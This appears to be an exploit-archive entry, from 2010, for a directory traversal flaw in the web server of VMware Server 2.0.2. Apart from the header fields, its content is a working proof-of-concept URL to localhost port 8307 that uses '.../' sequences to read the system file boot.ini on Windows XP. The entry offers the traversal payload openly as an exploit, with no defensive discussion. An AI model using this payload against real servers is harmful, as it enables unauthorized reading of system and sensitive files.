VMware 2 Web Server Directory Traversal

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : VMware 2 Web Server Directory Traversal
# Published : 2010-11-25
# Author : clshack
# Previous Title : Trend Micro Internet Security 2010 ActiveX Remote Exploit (UfPBCtrl.DLL)
# Next Title : HP LaserJet Directory Traversal in PJL Interface

# Exploit Title:VMware 2 Web Server Directory Traversal
# Date:15/11/2010
# Author: clshack
# Software Link: http://www.vmware.com/products/server/
# Version:2.0.2
# Tested on: windows xp sp3 en
# CVE :

VMWARE:
http://localhost:8307/

<http://localhost:8307/.../.../.../.../.../boot.ini>
http://localhost:8307/.../.../.../.../.../boot.ini

<http://localhost:8307/.../.../.../.../.../boot.ini>VMware try to load xml
...

-- 
Alessio Dalla Piazza (Personal Blog:
http://www.clshack.it)<http://www.clshack.it>